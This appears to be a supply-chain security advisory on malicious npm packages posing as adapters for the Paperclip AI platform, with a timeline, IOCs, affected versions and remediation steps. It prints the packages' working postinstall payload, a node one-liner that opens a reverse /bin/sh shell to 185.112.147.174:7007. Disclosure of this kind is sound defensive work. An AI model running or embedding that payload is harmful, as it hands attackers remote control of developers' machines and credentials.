Feed
HighPublished 4 Jul 2026Updated 8 Jul 20265 packages · 14 versions

paperclip2 / vps-maintenance postinstall reverse shell to 185.112.147.174:7007

Summary

On 2026-07-04 the OX Research team disclosed npm packages — paperclip2, vps-maintenance, vps-maintenance-paperclip-adapter — published by user srm0rgan that hide a postinstall reverse shell to 185.112.147.174:7007 inside package.json. paperclip2 ships with no JavaScript files at all, defeating static scanners that only inspect .js. Two follow-on names — paperclip-host-utils and vps-adapter-core — landed 2026-07-07 and joined the same GHSA takedown.

typosquatobfuscationcredential-theft
Detected by
OX Security
Also known as
paperclip2 reverse shell
Ecosystems
npm
Packages tracked
5

What happened

On 2026-07-04 OX Research disclosed a small but noteworthy npm supply-chain campaign: three packages published by the srm0rgan maintainer account (email srm0rgan@proton.me) all carry a single-line postinstall script that opens a raw TCP connection to 185.112.147.174:7007 and pipes it into /bin/sh.

The evasion — no JavaScript at all

paperclip2@1.0.0 was published 2026-07-04 12:21 UTC and contains one file: package.json. There is no index.js, no source directory, and no build output. The malicious behaviour is entirely inside the scripts.postinstall field:

`` node -e "const c=require('net').connect(7007,'185.112.147.174'); const p=require('child_process').spawn('/bin/sh',[]); c.pipe(p.stdin);p.stdout.pipe(c);p.stderr.pipe(c);" ``

Many npm malware scanners default to analysing .js files inside the tarball. A package that has no .js code passes those checks trivially — the reverse shell only becomes visible if the scanner also parses package.json scripts.

Typosquat context

vps-maintenance (0.1.0, 2026-07-04) and vps-maintenance-paperclip-adapter (0.1.0 clean 2026-07-03, then poisoned 0.1.1/0.1.2 on 2026-07-03/07-04) present themselves as adapters for the legitimate open-source Paperclip AI orchestration platform (@paperclipai/* on npm, paperclipai/paperclip on GitHub). The README for vps-maintenance-paperclip-adapter is a plausible product page describing SSH-based VPS maintenance commands run from the Paperclip UI, including an install snippet (POST /api/adapters/install { "packageName": "vps-maintenance-paperclip-adapter" }). None of that functionality exists — the postinstall runs before any of it can matter.

Version rollout timeline

  • 2026-07-03 10:48 UTC — vps-maintenance-paperclip-adapter@0.1.0 published (clean; no postinstall)
  • 2026-07-03 11:27 UTC — vps-maintenance-paperclip-adapter@0.1.1 published with the reverse-shell postinstall
  • 2026-07-04 12:14 UTC — vps-maintenance-paperclip-adapter@0.1.2 republishes the same payload
  • 2026-07-04 12:19 UTC — vps-maintenance@0.1.0 published with the same reverse shell
  • 2026-07-04 12:21 UTC — paperclip2@1.0.0 published with the same reverse shell (no .js files)

Each republish shares the same maintainer, the same signature keyid, and the same C2 destination — this is one operator refining the packaging (README, scope hunt) between attempts.

IOCs

  • Command-and-control: 185.112.147.174:7007 (raw TCP, no TLS, /bin/sh bidirectional pipe)
  • Maintainer: srm0rgan / srm0rgan@proton.me
  • Package integrity hashes (SHA-512, from npm registry): paperclip2@1.0.0 sha512-nAXbGaLpALwzD8GfhfY4wiE9oXBWkpxzILp+1qzISRO6wHunjS3LyZ+TtDls7fk2A8vjfYARyeKTdZTQR1Rmdw==; vps-maintenance@0.1.0 sha512-Kwj71je+AYz1+E4g35VVwjStRIL4Xfhk9VqPJ1+yZ3FdKOxCXUpMRAsMJPtRr2/8paaw/v99hrnRMqc1IJsjjg==; vps-maintenance-paperclip-adapter@0.1.2 sha512-rJeZY0RmjzPFgRjID3xLVTCLLGuYkBQ/k1RB5n/Dy74U3NYRBm4ML3n1US6sWVB2wdIZILEE9LMuvRlmwMbvpg==

Affected packages (5)

  • npmpaperclip-host-utils
    1.0.01.0.21.0.31.0.41.0.51.0.61.0.7
  • npmpaperclip2
    1.0.0
  • npmvps-adapter-core
    1.0.01.0.11.0.2
  • npmvps-maintenance
    0.1.0
  • npmvps-maintenance-paperclip-adapter
    0.1.10.1.2

Impact

  • Any host that ran npm install on paperclip2, vps-maintenance, or vps-maintenance-paperclip-adapter@0.1.1/0.1.2 executed a /bin/sh reverse shell to 185.112.147.174:7007
  • paperclip2 contains a single file — package.json — with the malicious postinstall script. There are no .js files to lint, so any scanner that only inspects JavaScript source code will pass the package clean
  • The vps-maintenance* packages plausibly typosquat the Paperclip AI orchestration platform ecosystem (see @paperclipai/* scope on npm) — a developer looking for a "VPS maintenance adapter for Paperclip" would find these three names credible
  • vps-maintenance-paperclip-adapter@0.1.0 (2026-07-03) was clean — the postinstall reverse shell only landed on 0.1.1 published minutes later on 2026-07-03, then a re-cut 0.1.2 on 2026-07-04. Anyone who upgraded from 0.1.0 to 0.1.1/0.1.2 was hit
  • The 2026-07-07 GHSA batch added two follow-on names — paperclip-host-utils@1.0.01.0.7 (7 versions published in the same 40-minute burst 2026-07-07 11:37–12:14 UTC) and vps-adapter-core@1.0.01.0.2 (three versions in a 25-minute burst 2026-07-07 08:37–09:00 UTC). GHSA advisories GHSA-m74w-fv2m-jcvw and GHSA-hvxm-858v-vhw9 classify both as CWE-506 Embedded Malicious Code. The rapid-fire republishing pattern matches the July 3–4 vps-maintenance rollout — same operator, refining the packaging

What to do

  1. 1Remove paperclip2, vps-maintenance, and vps-maintenance-paperclip-adapter from package.json and every lockfile; delete node_modules and reinstall
  2. 2On any Linux/macOS build host that resolved these packages: check for processes listening/connected on port 7007 (ss -tunp | grep 7007, lsof -i :7007) and kill any /bin/sh spawned by node
  3. 3Egress-block 185.112.147.174 at your firewall and add it to your IOC feed; check outbound proxy/NetFlow logs for connections to that IP:7007 during the exposure window
  4. 4Rotate every credential accessible from any build host that installed these packages — SSH keys, cloud CLI tokens, npm/GitHub tokens, environment variables loaded by the shell
  5. 5Add a lockfile guard for these three names in your private mirror and CI — Verdaccio/Nexus/Artifactory may still serve the malicious tarballs from cache even after the public yank
  6. 6If you were legitimately evaluating the Paperclip AI orchestration platform, the correct scope is @paperclipai/* on npm — paperclip2 and the vps-maintenance* names are not affiliated with that project

References

npm-2026-07-04-paperclip2-reverse-shell